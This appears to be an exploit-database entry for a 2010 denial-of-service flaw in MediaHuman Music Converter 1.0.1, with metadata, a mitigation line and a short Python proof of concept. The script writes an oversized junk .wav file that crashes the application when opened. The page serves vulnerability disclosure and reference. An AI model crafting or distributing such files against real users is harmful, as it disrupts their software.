header-logo
Suggest Exploit
vendor:
MediaHuman Music Converter
by:
modpr0be
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: MediaHuman Music Converter
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:mediahuman:mediahuman_music_converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service

MediaHuman Music Converter 1.0.1 is vulnerable to a denial of service attack when a specially crafted .wav or .mp3 file is opened. The application crashes when the file is opened, and a Windows auto report and solution window pops out.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

# Exploit Title: MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service
# Date: September 17, 2010
# Author: modpr0be
# Software Link: http://www.mediahuman.com/download.html
# Version: 1.0.1
# Tested on: Windows 7
# CVE :

# How it works?
# Go to Add Files... --> Choose blah .wav and bang! app crash..
# Testing on Windows 7 Ultimate..crashed, windows auto report and solution
window pop out..
# works on .wav and .mp3

#!/usr/bin/python

junk = "\x41" * 25000

file = open('blah.wav','w')
file.write(junk)
file.close()

Navigation

Suggest Exploit

Services By CQR